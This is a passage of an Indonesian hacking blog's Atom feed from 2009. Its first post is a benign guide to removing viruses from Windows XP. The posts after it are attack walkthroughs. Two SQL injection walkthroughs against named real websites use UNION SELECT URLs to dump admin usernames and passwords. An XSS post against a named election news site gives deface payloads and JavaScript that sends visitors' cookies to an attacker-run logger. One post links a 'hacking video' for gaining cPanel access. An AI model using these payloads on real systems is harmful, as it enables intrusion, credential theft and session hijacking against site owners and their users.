kembali dikomputer dan jalankan sistem seperti biasa. Lakukan pemeriksaan kembali apakah komputer masih menunjukkan gejala yang sama saat terkena virus. Cara ini ampuh membersihkan virus sepanjang antivirus di komputer lain tersebut dapat mengenali dan menghapus virus di hardisk yang terinfeksi. Namun virus masih meninggalkan jejak berupa autorun atau startup yang tidak berfungsi. Jejak ini terkadang memunculkan pesan error yang tidak berbahaya namun mungkin sedikit mengganggu.&lt;/p&gt; &lt;h4&gt;Menghapus dengan sistem operasi lain&lt;/h4&gt; &lt;p&gt;Pada laptop atau komputer yang tidak dapat dilepas harddisknya maka cara lain adalah menjalankan sistem operasi lain yang tidak terinfeksi virus dan melakukan full scan terhadap seluruh harddisk. Biasanya ada beberpa pengguna yang menggunakan dual OS seperti Linux dan Windows atau Windows XP dan Windows Vista dsb. Selain itu bisa juga menggunakan LiveCD atau OS Portable seperti Knoopix dan Windows PE ( Windows yang telah diminimazed dan dapat dibooting dari media penyimpanan portable seperti flash disk atau CD.) lalu lakukan full scanning dengan antivirus terbaru. Efektifnya sama dengan menghapus virus dengan antivirus di komputer lain contoh diatas. Virus terkadang masih meninggalkan jejak tidak berbahaya.&lt;/p&gt; &lt;h4&gt;Menghapus secara manual&lt;/h4&gt; &lt;p&gt;Bila anda kesulitan melakukan hal diatas masih ada cara lain yaitu dengan cara manual. Langkah-langkah tersebut adalah:&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Matikan process yang dijalankan oleh virus. Virus yang aktif pasti memiliki process yang berjalan pada sistem. Process ini biasanya memantau aktifitas sistem dan melakukan aksinya bila ada kejadian tertentu yang dikenali virus tersebut. Contohnya pada saat kita memasang flash disk, process virus akan mengenali aksi tersebut dan menginfeksi flash disk dengan virus yang sama. Proses ini harusnya bisa dilihat dari task manager yang bisa diaktifkan dengan tombol Ctrl + Alt + Del namun terkadang virus akan memblokir aksi ini dengan melakukan log off, menutup window Task Manager, atau restart sistem. Cara lain adalah menggunakan tool lain untuk melihat dan mematikan proses virus. Saya biasa menggunakan Process Explorer dari &lt;a href="http://www.sysinternals.com/"&gt;http://www.sysinternals.com/&lt;/a&gt; . Dengan tool ini anda bisa mematikan process yang dianggap virus. Pada saat mematikan proses milik virus perlu diperhatikan terkadang proses milik virus terdiri atas lebih dari 1 proses yang saling memantau. Bila 1 proses dimatikan maka proses tsb akan dihidupkan lagi dengan proses lainnya. Karena itu mematikan process virus harus dengan cepat sebelum proses yang dimatikan dihidupkan lagi oleh proses lainnya. Kenali terlebih dahulu proses yang dianggap virus lalu matikan semuanya dengan cepat. Biasanya virus menyamar menyerupai proses windows tapi tentu ada bedanya seperti IExplorer.exe yang meniru Explorer.exe. Berikut adalah proses windows yang bisa dijadikan referensi proses yang dikategorikan aman: &lt;pre&gt;&lt;blockquote&gt;C:\WINDOWS\system32\smss.exe&lt;br /&gt;C:\WINDOWS\system32\csrss.exe&lt;br /&gt;C:\WINDOWS\system32\winlogon.exe&lt;br /&gt;C:\WINDOWS\system32\services.exe&lt;br /&gt;C:\WINDOWS\system32\svchost.exe&lt;br /&gt;C:\WINDOWS\system32\lsass.exe&lt;br /&gt;C:\WINDOWS\Explorer.exe&lt;/blockquote&gt;&lt;/pre&gt; &lt;p&gt;Selain process explorer anda bisa menggunakan tools lainnya yang mungkin lebih mudah dan bisa menghapus process sekaligus. Contoh lain adalah HijackFree. Anda bisa mencari di google tools sejenis. &lt;/p&gt;&lt;/li&gt;&lt;li&gt;Setelah proses mematikan virus berhasil lakukan pengembalian nilai default parameter sistem yang digunakan virus untuk mengaktifkan dirinya dan memblokir usaha menghapus dirinya. Parameter tersebut berada pada registry windows yang bisa di reset dengan nilai defaultnya. Simpan file berikut dengan nama apa saja dengan extention file .reg. Kemudian eksekusi file tersebut dengan mengklik 2 kali. Bila ada konfirmasi anda bisa menjawab Yes/Ok. Berikut file registry tersebut: &lt;pre&gt;&lt;blockquote&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]&lt;br /&gt;"Hidden"=dword:00000000&lt;br /&gt;"SuperHidden"=dword:00000000&lt;br /&gt;"ShowSuperHidden"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]&lt;br /&gt;"AlternateShell"="Cmd.exe"&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot]&lt;br /&gt;"AlternateShell"="Cmd.exe"&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]&lt;br /&gt;"AlternateShell"="Cmd.exe"&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]&lt;br /&gt;"Shell"="Explorer.exe"&lt;br /&gt;"Userinit"="C:\WINDOWS\system32\userinit.exe,"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\regfile\shell\open\command]&lt;br /&gt;@="regedit.exe \"%1\""&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\scrfile\shell\open\command]&lt;br /&gt;@="\"%1\" %*"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\piffile\shell\open\command]&lt;br /&gt;@="\"%1\" %*"&lt;br /&gt;[HKEY_CLASSES_ROOT\comfile\shell\open\command]&lt;br /&gt;@="\"%1\" %*"&lt;br /&gt;[HKEY_CLASSES_ROOT\exefile\shell\open\command]&lt;br /&gt;@="\"%1\" %*"&lt;/blockquote&gt;&lt;/pre&gt; &lt;p&gt;File registry diatas akan membuka blokir regedit, mencegah virus mencangkokkan dirinya pada sistem, dan reset parameter lain untuk mencegah virus jalan lagi. &lt;/p&gt;&lt;/li&gt;&lt;li&gt;Setelah proses virus dimatikan dan parameter sistem di reset. Cegah virus aktif kembali dengan menghapus entry virus pada autorun dan startup Windows. Bisa menggunakan tool bawaan windows MSConfig atau mengedit langsung pada registry dengan Regedit. Untuk lebih mudahnya gunakan tools pihak ketiga seperti autoruns dari &lt;a href="http://www.sysinternals.com/"&gt;http://www.sysinternals.com&lt;/a&gt; untuk menghapus entry autorun dan startup milik virus tsb. Jangan lupa periksa folder StartUp pada menu Start Menu -&gt; Programs -&gt; Startup dan pastikan tidak ada entry virus tsb.&lt;/li&gt;&lt;li&gt;Download antivirus terbaru dan lakukan full scanning pada sistem agar antivirus memeriksa keseluruhan sistem dan menghapus semua virus yang ditemukan. Saya menyarankan avira yang bisa didownload dari &lt;a href="http://www.free-av.com/"&gt;http://www.free-av.com&lt;/a&gt; karena sifatnya free dan scanner virus yang sama tangguhnya dengan antivirus komersil seperti Symantec atau Kaspersky.&lt;/li&gt;&lt;li&gt;Sebelum restart pastikan anda tidak melewatkan virus baik dari proces atau autorun dan startup sistem. Karena bila tidak maka pada saat restart maka sistem akan kembali seperti pada saat terinfeksi virus dan sia-sia semua langkah yang anda lakukan sebelumnya.&lt;/li&gt;&lt;li&gt;Setelah restart periksa kembali komputer anda dan perhatikan apakah gejala yang muncul pada saat komputer terinfeksi masih ada atau tidak. Bila ada maka anda terlewat beberpa autorun virus atau reset parameter sistem diatas tidak berhasil. Lakukan langkah diatas dan periksa lebih cermat tiap langkah anda sebelum melakukan restart sistem.&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;Itulah langkah-langkah penghapusan virus pada sistem Windows XP. Untuk mencegah virus datang kembali sebaiknya anda rajin update antivirus atau memasang aplikasi pencegah seperti WinPooch atau Comodo Firewall yang akan memperingatkan pengguna bila ada program lain yang akan memodifikasi sistem. Jadi walaupun virus tersebut tidak dikenali akan tetapi sebelum masuk maka pengguna akan diperingatkan oleh aplikasi pencegah. Bila anda mengenali program yang hendak mengakses sistem anda maka anda bisa mengijinkan akses tersebut namun bila tidak sebaiknya tolak dan blokir akses tersebut karena ada kemungkinan program tersebut adalah virus.&lt;/p&gt; &lt;p&gt;Berhati-hati pada saat membuka flash disk. Jangan membuka flash disk dengan klik 2 kali. Buka dengan klik kanan lalu pilih menu Open agar fitur autoplay pada flash disk tidak menjalankan virus secara ototmatis. Jangan lupa perhatikan file yang anda buka. Walaupun iconnya sama perhatikan bahwa file yang anda buka buka tipe application atau program. Pastikan file word adalah betul-betul word dan folder betul-betul folder bisa dengan melihat detail atau properties dari file tsb. Semoga artikel ini membantu dan mencegah anda terinfeksi virus komputer.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-3222461394454501587?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/3222461394454501587/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/05/beberapa-tahun-belakangan-banyak.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/3222461394454501587'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/3222461394454501587'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/05/beberapa-tahun-belakangan-banyak.html' title='Langkah-langkah menghilangkan virus komputer'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-7536513147955006565</id><published>2009-05-11T07:29:00.000-07:00</published><updated>2009-05-11T07:54:49.411-07:00</updated><title type='text'>How To Get cPanel ( Video )</title><content type='html'>&lt;dl class="codebox"&gt;&lt;dd&gt;&lt;a href="http://ludastore.com/images/cpanel.rar"&gt;&lt;code&gt;http://ludastore.com/images/cpanel.rar&lt;/code&gt;&lt;/a&gt;&lt;/dd&gt;&lt;/dl&gt;ini adalah video hacking mendapatkan akses cpanel,,&lt;br /&gt;silahkan di download,,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-7536513147955006565?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/7536513147955006565/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/05/how-to-get-cpanel-video.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/7536513147955006565'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/7536513147955006565'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/05/how-to-get-cpanel-video.html' title='How To Get cPanel ( Video )'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-1498829251673463452</id><published>2009-05-10T10:04:00.000-07:00</published><updated>2009-05-11T07:22:46.269-07:00</updated><title type='text'>http://banksoal-online.com/</title><content type='html'>TErlebih dahulu kita harus login sebagai user untuk dapat membaca berita,,&lt;br /&gt;&lt;br /&gt;&lt;a href="http://banksoal-online.com/"&gt;http://banksoal-online.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;a target="_blank" href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55"&gt;&lt;span class="yshortcuts" id="lw_1241975094_1"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1.memunculkan error: &lt;a target="_blank" href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55"&gt;&lt;span class="yshortcuts" id="lw_1241975094_1"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55&lt;/span&gt;&lt;/a&gt;'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.Memeriksa jumlah field dari suatu tabel:&lt;br /&gt;-&gt;&lt;a target="_blank" href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55%20order%20by%2021--"&gt;&lt;span class="yshortcuts" id="lw_1241975094_2"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55%20order%20by%2021--&lt;/span&gt;&lt;/a&gt;    #gk error#&lt;br /&gt;-&gt;&lt;a target="_blank" href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55%20order%20by%2022--"&gt;&lt;span class="yshortcuts" id="lw_1241975094_3"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=55%20order%20by%2022--&lt;/span&gt;&lt;/a&gt;    #error#&lt;br /&gt;&lt;br /&gt;3.Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan: &lt;a target="_blank" href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--"&gt;&lt;span class="yshortcuts" id="lw_1241975094_4"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4.mengeluarkan nama-nama tabel:  &lt;a target="_blank" href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,group_concat%28table_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables%20where%20table_schema=database%28%29--"&gt;&lt;span class="yshortcuts" id="lw_1241975094_5"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,group_concat&lt;/span&gt;&lt;/a&gt;&lt;a href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,group_concat%28table_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables%20where%20table_schema=database%28%29--"&gt;(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables%20where%20table_schema=database()--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5.memunculkan nama field dari tabel tuseradmin: &lt;a href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,group_concat%28column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns%20where%20table_name=0x747573657261646d696e--"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns%20where%20table_name=0x747573657261646d696e--&lt;/a&gt;&lt;br /&gt;nama tabel,yakni dlm hal ini users,harus dikonversikan ke hex,, untuk mengubah string ke hex,silahkan kesini &lt;a target="_blank" href="http://www.string-functions.com/string-hex.aspx"&gt;&lt;span class="yshortcuts" id="lw_1241975094_6"&gt;http://www.string-functions.com/string-hex.aspx&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5.Langkah terakhir kita akan mengeluarkan record-record dari tabel tuseradmin: &lt;a href="http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,group_concat%28userid,0x3a,password%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20tuseradmin--"&gt;http://banksoal-online.com/evenberita.php?fcmd=DETAIL&amp;amp;id=-55%20union%20select%201,2,3,4,5,group_concat(userid,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20tuseradmin--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;admin telah diberitahu,, dan di respon dengan baik,,&lt;br /&gt;maju terus IT indonesia,,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-1498829251673463452?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/1498829251673463452/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/05/httpbanksoal-onlinecom.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/1498829251673463452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/1498829251673463452'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/05/httpbanksoal-onlinecom.html' title='http://banksoal-online.com/'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-5348416138996836240</id><published>2009-05-09T16:54:00.000-07:00</published><updated>2009-05-10T09:00:54.699-07:00</updated><title type='text'>XXS attack</title><content type='html'>XXS attack&lt;br /&gt;Proof of Concept (pembuktian)&lt;br /&gt;####################################&lt;br /&gt;Apa itu xss attack??? silakan cari disini : google.com atau jasakom.com&lt;br /&gt;&lt;br /&gt;target    : &lt;a href="http://pemilu.antara.co.id/"&gt;http://pemilu.antara.co.id&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;1.mengetaui site itu mempunyai celah xss attack:&lt;br /&gt;-&gt;masukkan javascript untuk memunculkan kotak dialog(pd contoh ini script dimasukkan melalui fasilitas search yg terdapat pd site tsb),contoh: &lt;script&gt;alert("gue disini")&lt;/script&gt;&lt;br /&gt;contoh: &lt;a href="http://pemilu.antara.co.id/search/?skey=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&amp;amp;schclicked=Cari"&gt;http://pemilu.antara.co.id/search/?skey=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&amp;amp;schclicked=Cari&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2.jika site itu terkena bug xss attack,maka banyak yg dpt kita lakukan dgn memanfaatkan kelemahan tsb,misalnya:&lt;br /&gt;-&gt;mendeface&lt;br /&gt;contoh    : &lt;a href="http://pemilu.antara.co.id/search/?skey=%3Chtml%3E%3Cbody%3E%3Cimg%20src=%22http://img184.imageshack.us/img184/8559/sukro2sj5.jpg%22%3E%3C/body%3E%3C/html%3E&amp;amp;schclicked=Cari"&gt;http://pemilu.antara.co.id/search/?skey=%3Chtml%3E%3Cbody%3E%3Cimg%20src=%22http://img184.imageshack.us/img184/8559/sukro2sj5.jpg%22%3E%3C/body%3E%3C/html%3E&amp;amp;schclicked=Cari&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;-&gt;mencuri cookie&lt;br /&gt;Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.&lt;br /&gt;Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.&lt;br /&gt;Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php&lt;br /&gt;Ok sekarang gw anggap lo dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.&lt;br /&gt;&lt;br /&gt;masukan code ini-&gt;&lt;br /&gt;&lt;br /&gt;Code:window.location = "http://server lo.com/cookielogger.php?c="+document.cookie&lt;br /&gt;&lt;br /&gt;atau&lt;br /&gt;&lt;br /&gt;Code:document.location = "http://Server lo.com/cookielogger.php?c="+document.cookie&lt;br /&gt;&lt;br /&gt;hingga otomatis url pada site berubah menjadi&lt;br /&gt;&lt;br /&gt;Code: http://Target.com/search.php?q=document.location = "http://server lo.com/cookielogger.php?c="+document.cookie&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-5348416138996836240?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/5348416138996836240/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/05/xxs-attack_09.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/5348416138996836240'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/5348416138996836240'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/05/xxs-attack_09.html' title='XXS attack'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-6304204036577126193</id><published>2009-05-09T16:46:00.000-07:00</published><updated>2009-05-10T09:01:08.712-07:00</updated><title type='text'>SQL injection</title><content type='html'>SQL injection&lt;br /&gt;Proof of Concept (pembuktian)&lt;br /&gt;###################################&lt;br /&gt;Apa itu xss attack??? silakan cari disini : google.com atau jasakom.com&lt;br /&gt;&lt;br /&gt;target    :&lt;a href="http://www.pmn.or.id/"&gt;http://www.pmn.or.id&lt;/a&gt;&lt;br /&gt;link    :&lt;a href="http://www.pmn.or.id/home_details_ind.php?id=14"&gt;http://www.pmn.or.id/home_details_ind.php?id=14&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.memunculkan error: &lt;a href="http://www.pmn.or.id/home_details_ind.php?id=14%27"&gt;http://www.pmn.or.id/home_details_ind.php?id=14'&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.Memeriksa jumlah field dari suatu tabel:&lt;br /&gt;-&gt;&lt;a href="http://www.pmn.or.id/home_details_ind.php?id=14%20order%20by%206--%20#gk%20error#"&gt;http://www.pmn.or.id/home_details_ind.php?id=14 order by 6--    #gk error#&lt;/a&gt;&lt;br /&gt;-&gt;&lt;a href="http://www.pmn.or.id/home_details_ind.php?id=14%20order%20by%207--%20#error#"&gt;http://www.pmn.or.id/home_details_ind.php?id=14 order by 7--    #error#&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3.Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan: &lt;a href="http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,5,6--"&gt;http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,5,6--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4.mengeluarkan nama-nama tabel: &lt;a href="http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat%28version%28%29,0x3a,table_name%29,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--"&gt;http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat(version(),0x3a,table_name),6%20from%20information_schema.tables%20where%20table_schema=database()--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;terlihat disana nama2 tabelnya dan versi database yg digunakan (versi  &lt;br /&gt;5.0.38-Debian_1)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5.memunculkan nama field dari tabel users: &lt;a href="http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat%28column_name%29,6%20from%20information_schema.columns%20where%20table_name=0x7573657273--"&gt;http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat(column_name),6%20from%20information_schema.columns%20where%20table_name=0x7573657273--&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;nama tabel,yakni dlm hal ini users,harus dikonversikan ke hex,, untuk mengubah string ke hex,silahkan kesini &lt;a href="http://www.string-functions.com/string-hex.aspx"&gt;http://www.string-functions.com/string-hex.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5.Langkah terakhir kita akan mengeluarkan record-record dari tabel users: &lt;a href="http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat%28id,0x3a,name,0x3a,password%29,6%20from%20users--"&gt;http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat(id,0x3a,name,0x3a,password),6%20from%20users--&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-6304204036577126193?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/6304204036577126193/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/05/sql-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/6304204036577126193'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/6304204036577126193'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/05/sql-injection.html' title='SQL injection'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
